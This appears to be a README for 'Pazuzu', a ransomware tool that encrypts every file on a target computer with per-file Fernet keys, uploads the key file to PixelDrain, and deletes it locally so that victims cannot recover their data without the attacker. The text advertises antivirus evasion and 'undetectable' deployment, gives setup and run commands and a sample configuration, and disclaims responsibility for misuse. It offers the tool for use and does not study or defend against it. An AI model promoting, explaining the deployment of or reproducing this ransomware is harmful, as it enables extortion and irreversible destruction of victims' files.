Brand new Crypto-Locker made using Fernet encryption method, an automatic parser go through all the files of the computer target, for each files, a new encryption key is used, making the forensics investigations harder, even impossible. At the end of the execution, a csv file is created, uploaded to PixelDrain and deleted from the computer. The only way to decrypt files is to have the PixelDrain file ID necessary to run the decrypt.py program. Pazuzu is 100% automatic, only changes needed to run properly can be done through conf.py file
I made this software, and I'm not responsible for what you do with it or any problems it causes. By using it, you agree to this rule.
- 100% Automatic & 100% Undetectable
- Encryption Method Unreversible
- Error Handled for Persistent Execution
- Comprehensive & Easy Usage
Before running Pazuzu, make sure you install these following libraries :
- requests
- cryptography
You can install them by typing this following command in your terminal :
pip3 install -r requirements.txt
Clone this repository to your local machine.
Open your terminal and navigate to the cloned repository.
Edit the config.py file, to encrypt you must change start_dir & tmp_csv values, to decrypt you must change pxfile_id value.
To encrypt, run the script by typing python3 pazuzu.py in your terminal. To decrypt, type python3 decrypt.pyin your terminal.
Pazuzu Locker can easily bypass all known antivirus, making it easier to deploy
Default usage of Pazuzu Locker from encryption to decryption on sample directory, conf.py used for demo :
param = {
'start_dir': '/home/pazuzu/sample',
'tmp_csv': 'tmp.csv',
'pxfile_id': 'FPJZjoAd'
}